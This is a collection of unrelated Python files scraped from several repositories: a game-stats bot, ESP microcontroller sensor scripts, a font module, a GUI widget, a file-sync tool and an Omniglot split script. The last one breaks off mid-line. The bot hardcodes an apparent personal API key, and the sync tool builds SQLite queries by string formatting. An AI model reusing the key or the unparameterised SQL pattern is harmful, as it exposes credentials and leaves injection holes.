#### File: wows_bot/libs/network_basic.py ```python from logging import exception import httpx import asyncio from nonebot import get_driver from pydantic.utils import unique_list async def PostRequestAsync(dest): try: async with httpx.AsyncClient() as client: resp = await client.get(dest) resp.raise_for_status() except httpx.HTTPError as exc: print(f'HTTP Exception for {exc.request.url} - {exc}') res = resp.json() if res['status'] == 'error': raise Exception(res['error']['code'], res['error']['message']) return res['data'] async def GetShipInfo(server:str,ship_id:str,language='zh-cn'): url = WowsRequestGenerater(server,['encyclopedia','ships'],{"ship_id":ship_id,'language':language}) res = await PostRequestAsync(url) return res[ship_id]['name'] async def GetTargetIdByRequest(server: str, field: str, name: str) -> str: assert field in ['clans', 'account'] url = WowsRequestGenerater(server, [field, 'list'], {'search': name}) res = await PostRequestAsync(url) return ( res[0]['clan_id'] if field == 'clans' else res[0]['account_id'] ) async def GetAllMapInfo(server: str): url = WowsRequestGenerater(server, ['encyclopedia', 'battlearenas'], {'language': 'zh-cn'}) mapinfo = await PostRequestAsync(url) mapdata = {} for key, value in mapinfo['data'].items(): mapdata[value['name']] = {'map_id': value['battle_arena_id'], 'description': value['description'], 'icon': value['icon']} return mapdata async def GetPersonalInfo(server: str, name: str): id = str(await GetTargetIdByRequest(server, 'account', name)) url = WowsRequestGenerater(server,['account','info'],{'account_id':id}) personalinfo = (await PostRequestAsync(url))[id] if personalinfo['hidden_profile']==True: raise exception('hidden profile') pvp = personalinfo['statistics']['pvp'] return { 'account_id':personalinfo['account_id'], 'created_at':personalinfo['created_at'], 'updated_at':personalinfo['updated_at'], 'battles':pvp['battles'], 'survive_rate':pvp['survived_battles']/pvp['battles'], 'kd':pvp['frags']/(pvp['battles']-pvp['survived_battles']), 'winrate':pvp['wins']/pvp['battles'] } async def GetClanInfo(server: str, name: str): if name.isdigit(): id = name else: id = await GetTargetIdByRequest(server, 'clans', name) id = str(id) url = WowsRequestGenerater(server, ['clans', 'info'], {'clan_id': id}) claninfo = (await PostRequestAsync(url))[id] return { 'name': claninfo['name'], 'members_count': claninfo['members_count'], 'creator_name': claninfo['creator_name'], 'clan_id': claninfo['clan_id'], 'updated_at': claninfo['updated_at'], 'leader_name': claninfo['leader_name'], 'tag': claninfo['tag'], #'description': claninfo['description'], } # http(s)://<server>/<API_name>/<method block>/<method name>/?<get params> def WowsRequestGenerater(server: str, api: list, func: dict) -> str: assert(server in ['com','asia','eu','ru']),'server invalid' url = 'https://api.worldofwarships.{:}/wows/'.format(server) for _, key in enumerate(api): url += '{:}/'.format(key) try: # appkey = get_driver().config.wargamingappkey appkey = '41eea5422846e9db1871963330a1ae04' # personal key will delete after release except: raise Exception('key error') url += '?application_id={:s}'.format(appkey) for ele in func.keys(): url += '&{:}={:}'.format(ele, func[ele]) return url ```
{ "source": "aabbtree77/esp12e-usb2ttl-ds18b20-dht11", "score": 3 }
#### File: aabbtree77/esp12e-usb2ttl-ds18b20-dht11/test.py ```python import machine import ds18x20 import onewire import time import dht #ds18x20 def rom_to_hex(rom): """Convert rom bytearray to hex string.""" return ''.join('{:02x}'.format(x) for x in rom) ds = ds18x20.DS18X20(onewire.OneWire(machine.Pin(2))) def read_ds18b20(): ds.convert_temp() time.sleep_ms(1000) tdict = {rom_to_hex(rom): ds.read_temp(rom) for rom in ds.scan()} tval = list(tdict.values()) return int(tval[0]) #DHT11 dht_sensor = dht.DHT11(machine.Pin(4)) def read_dht11(): dht_sensor.measure() time.sleep_ms(2000) return (dht_sensor.temperature(), dht_sensor.humidity()) #Heat output, on/off reversed!!! On means inactive, LED=0. pin_heat = machine.Pin(13, machine.Pin.OUT) pin_heat.on() T_ds18b20 = 0 T_dht11 = 0 H_dht11 = 0 #Set to True to check if the board is responding (blinking LED) while False: pin_heat.off() time.sleep_ms(1000) pin_heat.on() time.sleep_ms(1000) while True: try: T_ds18b20 = read_ds18b20() except Exception as e: print("Ignoring DS18b20 error, code {}.".format(e)) try: T_dht11, H_dht11 = read_dht11() except Exception as e: print("Ignoring DHT11 error, code {}.".format(e)) if T_ds18b20 > T_dht11: pin_heat.off() else: pin_heat.on() #time.sleep_ms(10000) print(T_ds18b20,T_dht11,H_dht11, pin_heat.value()) ```
{ "source": "aabbtree77/esp32-mqtt-experiments", "score": 2 }
#### File: gui/fonts/arial10.py ```python version = '0.25' def height(): return 10 def max_width(): return 11 def hmap(): return True def reverse(): return False def monospaced(): return False def min_ch(): return 32 def max_ch(): return 126 _font =\ b'\x06\x00\x70\x88\x08\x10\x20\x20\x00\x20\x00\x00\x03\x00\x00\x00'\ b'\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x80\x80\x80\x80\x80\x80'\ b'\x00\x80\x00\x00\x04\x00\xa0\xa0\xa0\x00\x00\x00\x00\x00\x00\x00'\ b'\x06\x00\x28\x28\xf8\x50\x50\xf8\xa0\xa0\x00\x00\x06\x00\x70\xa8'\ b'\xa0\x70\x28\x28\xa8\x70\x20\x00\x0a\x00\x62\x00\x94\x00\x94\x00'\ b'\x68\x00\x0b\x00\x14\x80\x14\x80\x23\x00\x00\x00\x00\x00\x07\x00'\ b'\x30\x48\x48\x30\x50\x8c\x88\x74\x00\x00\x02\x00\x80\x80\x80\x00'\ b'\x00\x00\x00\x00\x00\x00\x04\x00\x20\x40\x80\x80\x80\x80\x80\x80'\ b'\x40\x20\x04\x00\x80\x40\x20\x20\x20\x20\x20\x20\x40\x80\x04\x00'\ b'\x40\xe0\x40\xa0\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x20\x20'\ b'\xf8\x20\x20\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x00\x80'\ b'\x80\x80\x04\x00\x00\x00\x00\x00\x00\xe0\x00\x00\x00\x00\x03\x00'\ b'\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x03\x00\x20\x20\x40\x40'\ b'\x40\x40\x80\x80\x00\x00\x06\x00\x70\x88\x88\x88\x88\x88\x88\x70'\ b'\x00\x00\x06\x00\x20\x60\xa0\x20\x20\x20\x20\x20\x00\x00\x06\x00'\ b'\x70\x88\x08\x08\x10\x20\x40\xf8\x00\x00\x06\x00\x70\x88\x08\x30'\ b'\x08\x08\x88\x70\x00\x00\x06\x00\x10\x30\x50\x50\x90\xf8\x10\x10'\ b'\x00\x00\x06\x00\x78\x40\x80\xf0\x08\x08\x88\x70\x00\x00\x06\x00'\ b'\x70\x88\x80\xf0\x88\x88\x88\x70\x00\x00\x06\x00\xf8\x10\x10\x20'\ b'\x20\x40\x40\x40\x00\x00\x06\x00\x70\x88\x88\x70\x88\x88\x88\x70'\ b'\x00\x00\x06\x00\x70\x88\x88\x88\x78\x08\x88\x70\x00\x00\x03\x00'\ b'\x00\x00\x80\x00\x00\x00\x00\x80\x00\x00\x03\x00\x00\x00\x80\x00'\ b'\x00\x00\x00\x80\x80\x80\x06\x00\x00\x00\x08\x70\x80\x70\x08\x00'\ b'\x00\x00\x06\x00\x00\x00\x00\xf8\x00\xf8\x00\x00\x00\x00\x06\x00'\ b'\x00\x00\x80\x70\x08\x70\x80\x00\x00\x00\x06\x00\x70\x88\x08\x10'\ b'\x20\x20\x00\x20\x00\x00\x0b\x00\x1f\x00\x60\x80\x4d\x40\x93\x40'\ b'\xa2\x40\xa2\x40\xa6\x80\x9b\x00\x40\x40\x3f\x80\x08\x00\x10\x28'\ b'\x28\x28\x44\x7c\x82\x82\x00\x00\x07\x00\xf8\x84\x84\xfc\x84\x84'\ b'\x84\xf8\x00\x00\x07\x00\x38\x44\x80\x80\x80\x80\x44\x38\x00\x00'\ b'\x07\x00\xf0\x88\x84\x84\x84\x84\x88\xf0\x00\x00\x06\x00\xf8\x80'\ b'\x80\xf8\x80\x80\x80\xf8\x00\x00\x06\x00\xf8\x80\x80\xf0\x80\x80'\ b'\x80\x80\x00\x00\x08\x00\x38\x44\x82\x80\x8e\x82\x44\x38\x00\x00'\ b'\x07\x00\x84\x84\x84\xfc\x84\x84\x84\x84\x00\x00\x02\x00\x80\x80'\ b'\x80\x80\x80\x80\x80\x80\x00\x00\x05\x00\x10\x10\x10\x10\x10\x90'\ b'\x90\x60\x00\x00\x07\x00\x84\x88\x90\xb0\xd0\x88\x88\x84\x00\x00'\ b'\x06\x00\x80\x80\x80\x80\x80\x80\x80\xf8\x00\x00\x08\x00\x82\xc6'\ b'\xc6\xaa\xaa\xaa\x92\x92\x00\x00\x07\x00\x84\xc4\xa4\xa4\x94\x94'\ b'\x8c\x84\x00\x00\x08\x00\x38\x44\x82\x82\x82\x82\x44\x38\x00\x00'\ b'\x06\x00\xf0\x88\x88\x88\xf0\x80\x80\x80\x00\x00\x08\x00\x38\x44'\ b'\x82\x82\x82\x9a\x44\x3e\x00\x00\x07\x00\xf8\x84\x84\xf8\x90\x88'\ b'\x88\x84\x00\x00\x07\x00\x78\x84\x80\x60\x18\x04\x84\x78\x00\x00'\ b'\x06\x00\xf8\x20\x20\x20\x20\x20\x20\x20\x00\x00\x07\x00\x84\x84'\ b'\x84\x84\x84\x84\x84\x78\x00\x00\x08\x00\x82\x82\x44\x44\x28\x28'\ b'\x10\x10\x00\x00\x0b\x00\x84\x20\x8a\x20\x4a\x40\x4a\x40\x51\x40'\ b'\x51\x40\x20\x80\x20\x80\x00\x00\x00\x00\x07\x00\x84\x48\x48\x30'\ b'\x30\x48\x48\x84\x00\x00\x08\x00\x82\x44\x44\x28\x10\x10\x10\x10'\ b'\x00\x00\x07\x00\x7c\x08\x10\x10\x20\x20\x40\xfc\x00\x00\x03\x00'\ b'\xc0\x80\x80\x80\x80\x80\x80\x80\x80\xc0\x03\x00\x80\x80\x40\x40'\ b'\x40\x40\x20\x20\x00\x00\x03\x00\xc0\x40\x40\x40\x40\x40\x40\x40'\ b'\x40\xc0\x05\x00\x20\x50\x50\x88\x00\x00\x00\x00\x00\x00\x06\x00'\ b'\x00\x00\x00\x00\x00\x00\x00\x00\xfc\x00\x04\x00\x80\x40\x00\x00'\ b'\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x70\x88\x78\x88\x98\xe8'\ b'\x00\x00\x06\x00\x80\x80\xb0\xc8\x88\x88\xc8\xb0\x00\x00\x06\x00'\ b'\x00\x00\x70\x88\x80\x80\x88\x70\x00\x00\x06\x00\x08\x08\x68\x98'\ b'\x88\x88\x98\x68\x00\x00\x06\x00\x00\x00\x70\x88\xf8\x80\x88\x70'\ b'\x00\x00\x04\x00\x20\x40\xe0\x40\x40\x40\x40\x40\x00\x00\x06\x00'\ b'\x00\x00\x68\x98\x88\x88\x98\x68\x08\xf0\x06\x00\x80\x80\xb0\xc8'\ b'\x88\x88\x88\x88\x00\x00\x02\x00\x80\x00\x80\x80\x80\x80\x80\x80'\ b'\x00\x00\x02\x00\x40\x00\x40\x40\x40\x40\x40\x40\x40\x80\x05\x00'\ b'\x80\x80\x90\xa0\xc0\xe0\xa0\x90\x00\x00\x02\x00\x80\x80\x80\x80'\ b'\x80\x80\x80\x80\x00\x00\x08\x00\x00\x00\xbc\xd2\x92\x92\x92\x92'\ b'\x00\x00\x06\x00\x00\x00\xf0\x88\x88\x88\x88\x88\x00\x00\x06\x00'\ b'\x00\x00\x70\x88\x88\x88\x88\x70\x00\x00\x06\x00\x00\x00\xb0\xc8'\ b'\x88\x88\xc8\xb0\x80\x80\x06\x00\x00\x00\x68\x98\x88\x88\x98\x68'\ b'\x08\x08\x04\x00\x00\x00\xa0\xc0\x80\x80\x80\x80\x00\x00\x06\x00'\ b'\x00\x00\x70\x88\x60\x10\x88\x70\x00\x00\x03\x00\x40\x40\xe0\x40'\ b'\x40\x40\x40\x60\x00\x00\x06\x00\x00\x00\x88\x88\x88\x88\x98\x68'\ b'\x00\x00\x06\x00\x00\x00\x88\x88\x50\x50\x20\x20\x00\x00\x0a\x00'\ b'\x00\x00\x00\x00\x88\x80\x94\x80\x55\x00\x55\x00\x22\x00\x22\x00'\ b'\x00\x00\x00\x00\x06\x00\x00\x00\x88\x50\x20\x20\x50\x88\x00\x00'\ b'\x06\x00\x00\x00\x88\x88\x50\x50\x20\x20\x20\x40\x06\x00\x00\x00'\ b'\xf8\x10\x20\x20\x40\xf8\x00\x00\x04\x00\x20\x40\x40\x40\x80\x40'\ b'\x40\x40\x40\x20\x02\x00\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80'\ b'\x04\x00\x80\x40\x40\x40\x20\x40\x40\x40\x40\x80\x06\x00\x00\x00'\ b'\x00\xe8\xb0\x00\x00\x00\x00\x00' _index =\ b'\x00\x00\x0c\x00\x0c\x00\x18\x00\x18\x00\x24\x00\x24\x00\x30\x00'\ b'\x30\x00\x3c\x00\x3c\x00\x48\x00\x48\x00\x5e\x00\x5e\x00\x6a\x00'\ b'\x6a\x00\x76\x00\x76\x00\x82\x00\x82\x00\x8e\x00\x8e\x00\x9a\x00'\ b'\x9a\x00\xa6\x00\xa6\x00\xb2\x00\xb2\x00\xbe\x00\xbe\x00\xca\x00'\ b'\xca\x00\xd6\x00\xd6\x00\xe2\x00\xe2\x00\xee\x00\xee\x00\xfa\x00'\ b'\xfa\x00\x06\x01\x06\x01\x12\x01\x12\x01\x1e\x01\x1e\x01\x2a\x01'\ b'\x2a\x01\x36\x01\x36\x01\x42\x01\x42\x01\x4e\x01\x4e\x01\x5a\x01'\ b'\x5a\x01\x66\x01\x66\x01\x72\x01\x72\x01\x7e\x01\x7e\x01\x8a\x01'\ b'\x8a\x01\x96\x01\x96\x01\xac\x01\xac\x01\xb8\x01\xb8\x01\xc4\x01'\ b'\xc4\x01\xd0\x01\xd0\x01\xdc\x01\xdc\x01\xe8\x01\xe8\x01\xf4\x01'\ b'\xf4\x01\x00\x02\x00\x02\x0c\x02\x0c\x02\x18\x02\x18\x02\x24\x02'\ b'\x24\x02\x30\x02\x30\x02\x3c\x02\x3c\x02\x48\x02\x48\x02\x54\x02'\ b'\x54\x02\x60\x02\x60\x02\x6c\x02\x6c\x02\x78\x02\x78\x02\x84\x02'\ b'\x84\x02\x90\x02\x90\x02\x9c\x02\x9c\x02\xa8\x02\xa8\x02\xb4\x02'\ b'\xb4\x02\xca\x02\xca\x02\xd6\x02\xd6\x02\xe2\x02\xe2\x02\xee\x02'\ b'\xee\x02\xfa\x02\xfa\x02\x06\x03\x06\x03\x12\x03\x12\x03\x1e\x03'\ b'\x1e\x03\x2a\x03\x2a\x03\x36\x03\x36\x03\x42\x03\x42\x03\x4e\x03'\ b'\x4e\x03\x5a\x03\x5a\x03\x66\x03\x66\x03\x72\x03\x72\x03\x7e\x03'\ b'\x7e\x03\x8a\x03\x8a\x03\x96\x03\x96\x03\xa2\x03\xa2\x03\xae\x03'\ b'\xae\x03\xba\x03\xba\x03\xc6\x03\xc6\x03\xd2\x03\xd2\x03\xde\x03'\ b'\xde\x03\xea\x03\xea\x03\xf6\x03\xf6\x03\x02\x04\x02\x04\x0e\x04'\ b'\x0e\x04\x1a\x04\x1a\x04\x26\x04\x26\x04\x32\x04\x32\x04\x3e\x04'\ b'\x3e\x04\x54\x04\x54\x04\x60\x04\x60\x04\x6c\x04\x6c\x04\x78\x04'\ b'\x78\x04\x84\x04\x84\x04\x90\x04\x90\x04\x9c\x04\x9c\x04\xa8\x04'\ _mvfont = memoryview(_font) def get_ch(ch): ordch = ord(ch) ordch = ordch + 1 if ordch >= 32 and ordch <= 126 else 32 idx_offs = 4 * (ordch - 32) offset = int.from_bytes(_index[idx_offs : idx_offs + 2], 'little') next_offs = int.from_bytes(_index[idx_offs + 2 : idx_offs + 4], 'little') width = int.from_bytes(_font[offset:offset + 2], 'little') return _mvfont[offset + 2:next_offs], 10, width ``` #### File: gui/widgets/scale.py ```python from gui.core.nanogui import DObject from gui.core.writer import Writer from gui.core.colors import BLACK class Scale(DObject): def __init__(self, writer, row, col, *, ticks=200, legendcb=None, tickcb=None, height=0, width=100, bdcolor=None, fgcolor=None, bgcolor=None, pointercolor=None, fontcolor=None): if ticks % 2: raise ValueError('ticks arg must be divisible by 2') self.ticks = ticks self.tickcb = tickcb def lcb(f): return '{:3.1f}'.format(f) self.legendcb = legendcb if legendcb is not None else lcb bgcolor = BLACK if bgcolor is None else bgcolor text_ht = writer.font.height() ctrl_ht = 12 # Minimum height for ticks # Add 2 pixel internal border to give a little more space min_ht = text_ht + 6 # Ht of text, borders and gap between text and ticks if height < min_ht + ctrl_ht: height = min_ht + ctrl_ht # min workable height else: ctrl_ht = height - min_ht # adjust ticks for greater height width &= 0xfffe # Make divisible by 2: avoid 1 pixel pointer offset super().__init__(writer, row, col, height, width, fgcolor, bgcolor, bdcolor) self.fontcolor = fontcolor if fontcolor is not None else self.fgcolor self.x0 = col + 2 self.x1 = col + self.width - 2 self.y0 = row + 2 self.y1 = row + self.height - 2 self.ptrcolor = pointercolor if pointercolor is not None else self.fgcolor # Define tick dimensions ytop = self.y0 + text_ht + 2 # Top of scale graphic (2 pixel gap) ycl = ytop + (self.y1 - ytop) // 2 # Centre line self.sdl = round(ctrl_ht * 1 / 3) # Length of small tick. self.sdy0 = ycl - self.sdl // 2 self.mdl = round(ctrl_ht * 2 / 3) # Medium tick self.mdy0 = ycl - self.mdl // 2 self.ldl = ctrl_ht # Large tick self.ldy0 = ycl - self.ldl // 2 def show(self): wri = self.writer dev = self.device x0: int = self.x0 # Internal rectangle occupied by scale and text x1: int = self.x1 y0: int = self.y0 y1: int = self.y1 dev.fill_rect(x0, y0, x1 - x0, y1 - y0, self.bgcolor) super().show() # Scale is drawn using ints. Each division is 10 units. val: int = self._value # 0..ticks*10 # iv increments for each tick. Its value modulo N determines tick length iv: int # val / 10 at a tick position d: int # val % 10: offset relative to a tick position fx: int # X offset of current tick in value units if val >= 100: # Whole LHS of scale will be drawn iv, d = divmod(val - 100, 10) # Initial value fx = 10 - d iv += 1 else: # Scale will scroll right iv = 0 fx = 100 - val # Window shows 20 divisions, each of which corresponds to 10 units of value. # So pixels per unit value == win_width/200 win_width: int = x1 - x0 ticks: int = self.ticks # Total # of ticks visible and hidden while True: x: int = x0 + (fx * win_width) // 200 # Current X position ys: int # Start Y position for tick yl: int # tick length if x > x1 or iv > ticks: # Out of space or data (scroll left) break if not iv % 10: txt = self.legendcb(self._fvalue(iv * 10)) tlen = wri.stringlen(txt) Writer.set_textpos(dev, y0, min(x, x1 - tlen)) wri.setcolor(self.fontcolor, self.bgcolor) wri.printstring(txt) wri.setcolor() ys = self.ldy0 # Large tick yl = self.ldl elif not iv % 5: ys = self.mdy0 yl = self.mdl else: ys = self.sdy0 yl = self.sdl if self.tickcb is None: color = self.fgcolor else: color = self.tickcb(self._fvalue(iv * 10), self.fgcolor) dev.vline(x, ys, yl, color) # Draw tick fx += 10 iv += 1 dev.vline(x0 + (x1 - x0) // 2, y0, y1 - y0, self.ptrcolor) # Draw pointer def _to_int(self, v): return round((v + 1.0) * self.ticks * 5) # 0..self.ticks*10 def _fvalue(self, v=None): return v / (5 * self.ticks) - 1.0 def value(self, val=None): # User method to get or set value if val is not None: val = min(max(val, - 1.0), 1.0) v = self._to_int(val) if v != self._value: self._value = v self.show() return self._fvalue(self._value) ``` #### File: esp32-mqtt-experiments/minihinch/test_ssd_dht_async.py ```python import uasyncio as asyncio import machine import dht from color_setup import ssd # On a monochrome display Writer is more efficient than CWriter. from gui.core.writer import Writer from gui.core.nanogui import refresh from gui.widgets.label import Label import gui.fonts.freesans20 as freesans20 import gui.fonts.arial35 as arial35 PROG_STATE = {} PROG_STATE['temperature'] = 99 PROG_STATE['humidity'] = 77 PROG_STATE['output1'] = 0 GLOB_PINOUT1 = machine.Pin(1, machine.Pin.OUT) async def display_outputs(): global PROG_STATE #ssd.fill(0) #refresh(ssd) Writer.set_textpos(ssd, 0, 0) # In case previous tests have altered it wri_val = Writer(ssd, arial35, verbose=False) wri_val.set_clip(False, False, False) wri_aux = Writer(ssd, freesans20, verbose=False) wri_aux.set_clip(False, False, False) field_val = Label(wri_val, 27, 2, wri_val.stringlen('-23.0C')) field_aux = Label(wri_aux, 0, 2, wri_aux.stringlen('Output: 0')) while True: for it in (0,1): #refresh(ssd) if it == 0: field_val.value('{:2.1f}C'.format(PROG_STATE['temperature'])) elif it==1: field_val.value('{:2.1f}%'.format(PROG_STATE['humidity'])) else: field_val.value('{}'.format('Should be unreachable.')) field_aux.value('Output: {}'.format(PROG_STATE['output1'])) await asyncio.sleep_ms(3000) refresh(ssd) #ssd.fill(0) #It is vital to fill with zeros here in this precise order! async def report_dht_data(sensor): global PROG_STATE n = 0 while True: #PROG_STATE['temperature'] = n #PROG_STATE['humidity'] = n+1 try: sensor.measure() PROG_STATE['temperature'] = sensor.temperature() PROG_STATE['humidity'] = sensor.humidity() #PROG_STATE['temperature'] = 55 #PROG_STATE['humidity'] = 33 await asyncio.sleep(1) except Exception as ex: PROG_STATE['temperature'] = n PROG_STATE['humidity'] = n n = n + 1 await asyncio.sleep(1) continue async def main(): global GLOB_PINOUT1 global PROG_STATE while True: GLOB_PINOUT1.on() PROG_STATE['output1'] = 1 await asyncio.sleep(1) GLOB_PINOUT1.off() PROG_STATE['output1'] = 0 await asyncio.sleep(1) asyncio.create_task(display_outputs()) d = dht.DHT22(machine.Pin(14)) asyncio.create_task(report_dht_data(d)) try: asyncio.run(main()) finally: asyncio.new_event_loop() ```
{ "source": "aabcce/offline_file_sync", "score": 2 }
#### File: offline_file_sync/export_file_list/export_file_list.py ```python import sys import os import stat import time import datetime from os.path import join import re import base64 from oslo_config import cfg from oslo_log import log from util import hashutil import threading import multiprocessing import sqlite3 LOG = log.getLogger(__name__) CONF = cfg.CONF export_file_list_opts = [ cfg.ListOpt('includes', default='', help='Include dirs'), cfg.ListOpt('excludes', default='', help='Exclude dirs'), cfg.StrOpt('export_sqlite_db', default='', help='Dest sqlite db file'), ] CONF.register_opts(export_file_list_opts, group='export_file_list') rLock = threading.RLock() conn = None def getTimestamp(): time_now = datetime.datetime.now().strftime("%Y-%m-%dT%H-%M-%S.%f") return time_now def initSqlite(dbfile): if os.path.isfile(dbfile): os.rename(dbfile, dbfile + "." + getTimestamp()) conn = sqlite3.connect(dbfile) cursor = conn.cursor() # ERROR_STATE # 1 folder is not readable # 2 file is not exist # 3 file is not readable # 4 file is not readable table_create_sql = 'create table file (ID INTEGER PRIMARY KEY AUTOINCREMENT, FOLDER TEXT, FILE TEXT,'\ ' ERROR_STATE INT, CTMP REAL, MTMP REAL, FSIZE INTEGER(8), HASH CHARACTER(32))' cursor.execute(table_create_sql) cursor.close() conn.commit() conn.close() def insert_data(data, conn = None): # logger = multiprocessing.log_to_stderr() dedicade_conn = conn is None if dedicade_conn: dbfile = CONF.export_file_list.export_sqlite_db conn = sqlite3.connect(dbfile) cursor = conn.cursor() # cursor.execute('insert into user (id, name) values (\'1\', \'Michael\')') table_insert_sql = "insert into file (FOLDER, FILE, ERROR_STATE, CTMP, MTMP, FSIZE, HASH)" \ " values ('{FOLDER}', '{FILE}', {ERROR_STATE}, {CTMP}, {MTMP}, {FSIZE}, '{HASH}')" if data.__class__.__name__ == "list": max_comm = 1024 rec = 0 for d in data: # print d sql = table_insert_sql.format(**d) cursor.execute(sql) # logger.info(sql) rec = rec + 1 if rec >= max_comm: conn.commit() rec = 0 if rec > 0: conn.commit() rec = 0 elif data.__class__.__name__ == "dict": sql = table_insert_sql.format(**data) # logger.info(sql) cursor.execute(sql) cursor.close() conn.commit() if dedicade_conn: conn.close() def dirworker(targetFolder): def onError(osError): dirname = osError.filename data = { "FOLDER": base64.encodestring(dirname), "FILE": '', "ERROR_STATE": 1, "CTMP": 0, "MTMP": 0, "FSIZE": 0, "HASH": '', } insert_data(data) def get_exclude_files_regex(): exclude_files = CONF.export_file_list.excludes exclude_files.append(os.path.abspath(CONF.export_file_list.export_sqlite_db)) exclude_files.append(os.path.dirname(os.path.dirname(__file__))) return [re.compile(f) for f in exclude_files] exclude_files_regex = get_exclude_files_regex() def match_excludes(file): # exclude_files_regex = get_exclude_files_regex() for regex in exclude_files_regex: if regex.match(file): return True return False global rLock dbfile = CONF.export_file_list.export_sqlite_db conn = sqlite3.connect(dbfile) for root, dirs, files in os.walk(top=targetFolder, topdown=True, onerror=onError, followlinks=False): print "Current root folder: " + root file_data = [] for file_name in files: full_file_path = join(root, file_name) if match_excludes(full_file_path): continue ctmp = 0 mtmp = 0 fsize = 0 error_state = 0 hash = '' try: file_state = os.stat(full_file_path) ctmp = file_state.st_ctime mtmp = file_state.st_mtime fsize = file_state.st_size except: err = sys.exc_info() LOG.error(str(err)) print(str(err)) error_state = 2 if (file_state.st_mode & stat.S_IFREG == stat.S_IFREG) and \ file_state.st_mode & stat.S_IFBLK != stat.S_IFBLK and \ file_state.st_mode & stat.S_IFSOCK != stat.S_IFSOCK and \ file_state.st_mode & stat.S_IFDIR != stat.S_IFDIR and \ file_state.st_mode & stat.S_IFCHR != stat.S_IFCHR and \ file_state.st_mode & stat.S_IFIFO != stat.S_IFIFO and \ os.access(full_file_path, os.R_OK): try: hash = hashutil.md5sum(full_file_path) except: err = sys.exc_info() LOG.error(str(err)) print(str(err)) error_state = 4 else: error_state = 3 data = { "FOLDER": base64.encodestring(root), "FILE": base64.encodestring(file_name), "ERROR_STATE": error_state, "CTMP": ctmp, "MTMP": mtmp, "FSIZE": fsize, "HASH": hash, } file_data.append(data) rLock.acquire() insert_data(file_data, conn) rLock.release() ready_dirs = [] for dir_name in dirs: full_dir_path = join(root, dir_name, os.path.pathsep) if not match_excludes(full_dir_path): ready_dirs.append(dir_name) dirs = ready_dirs conn.close() def run(): time1 = time.time() LOG.info('Started at: ' + getTimestamp()) print('Started at: ' + getTimestamp()) include_dirs = CONF.export_file_list.includes dbfile = CONF.export_file_list.export_sqlite_db initSqlite(dbfile) for targetFolder in include_dirs : p = multiprocessing.Process(target=dirworker, name="dirworker" + "." + getTimestamp(), args=(targetFolder,)) p.start() p.join() # dirworker(targetFolder) time2 = time.time() LOG.info('Ended at: ' + getTimestamp()) print('Ended at: ' + getTimestamp()) LOG.info('Last ' + str(time2 - time1) + ' s') print('Last ' + str(time2 - time1) + ' s') ``` #### File: aabcce/offline_file_sync/harness.py ```python import sys import os import multiprocessing from export_file_list import export_file_list from compare_file_list import compare_file_list from backup_file_list import backup_file_list work_folder = os.path.dirname(os.path.abspath(__file__)) # sys.path.append(work_folder) from oslo_config import cfg from oslo_log import log CONF = cfg.CONF # LOG = log.getLogger(__name__) # log.register_options(CONF) CLI_OPTS = [ cfg.ListOpt('task', default=[], help='Task type'), ] CONF.register_cli_opts(CLI_OPTS) CONF(default_config_files=[work_folder + "/conf/harness.conf"]) # log.setup(CONF, 'harness') LOG = multiprocessing.log_to_stderr() def __help(): print """ Usage: harness --task=export harness --task=compare [Linux Only] harness --task=backup """ if __name__ == "__main__": argv = sys.argv if len(argv) == 0 : print __help() exit() if argv[0].rfind("harness.py") > -1: argv.pop(0) if len(argv) == 0 : print __help() exit() if CONF.task[0] == "export": try: export_file_list.run() except: err = sys.exc_info() LOG.error(str(err)) print(str(err)) elif CONF.task[0] == "compare": if sys.platform == "win32": print "Error: Windows is not well tested." exit() try: compare_file_list.run() except: err = sys.exc_info() LOG.error(str(err)) print(str(err)) elif CONF.task[0] == "backup": try: backup_file_list.run() except: err = sys.exc_info() LOG.error(str(err)) print(str(err)) else: print __help() exit() ``` #### File: harness/exportfile/models.py ```python from __future__ import unicode_literals from django.db import models class File(models.Model): class Meta: managed = False db_table = "file" ID = models.AutoField(primary_key=True) FOLDER = models.CharField(max_length=512) FILE = models.CharField(max_length=512) ERROR_STATE = models.IntegerField() CTMP = models.FloatField() MTMP = models.FloatField() FSIZE = models.IntegerField() HASH = models.CharField(max_length=32) def toDict(self): return dict([(attr, getattr(self, attr)) for attr in [f.name for f in self._meta.fields]]) # type(self._meta.fields).__name__ ```
{ "source": "aabdelkad/prototypical-networks", "score": 3 }
#### File: prototypical-networks/scripts/original_script.py ```python import os import argparse import zipfile def prepare_txt_file_content(files): content = [] for name in files: _, alphabet, character, _ = name.split('/') line = os.path.join(alphabet, character, 'rot000') + '\n' if line not in content: content.append(line) return content parser = argparse.ArgumentParser(description='Create original split') default_images_base_dir = '.' parser.add_argument('--images_base_dir', type=str, default=default_images_base_dir, help="location of images zip files (default: {:s})".format(default_images_base_dir)) default_split_txt_dir = 'data/omniglot/splits/original' parser.add_argument('--split_txt_dir', type=str, default=default_split_txt_dir, help="location of directory to place split txt files (default: {:s})".format(default_split_txt_dir)) parser.add_argument('--validation_size', type=float, default=0.20,help="fraction of images to put in val") args = vars(parser.parse_args()) validation_size = args['validation_size'] images_background_path = os.path.join(args['images_base_dir'], 'images_background.zip') images_evaluation_path = os.path.join(args['images_base_dir'], 'images_evaluation.zip') trainval_path = os.path.join(args['split_txt_dir'], 'trainval.txt') test_path = os.path.join(args['split_txt_dir'], 'test.txt') train_path = os.path.join(args['split_txt_dir'], 'train.txt') val_path = os.path.join(args['split_txt_dir'], 'val.txt') if not os.path.isdir(args['split_txt_dir']): os.mkdir(args['split_txt_dir']) zip = zipfile.ZipFile(images_background_path) background_files = list(filter(lambda x: True if '.png' in x else False, list(zip.namelist()))) zip = zipfile.ZipFile(images_evaluation_path) evaluation_files = list(filter(lambda x: True if '.png' in x else False, list(zip.namelist()))) print("total images number {n}".format(n=len(evaluation_files)+len(background_files))) ############# Trainval ########################################################## trainval = prepare_txt_file_content(background_files) print('writing trainval txt, number of trainval images={n}'.format(n=len(trainval))) with open(trainval_path, 'w') as trainval_file: trainval_file.writelines(trainval) ############# Train/Val ########################################################## split_index = int(validation_size * len(background_files)) train_files = background_files[:-split_index] val_files = background_files[-split_index:] train = prepare_txt_file_content(train_files) print('writing train txt, number of train images={n}'.format(n=len(train))) with open(train_path, 'w') as train_file: train_file.writelines(train) val = 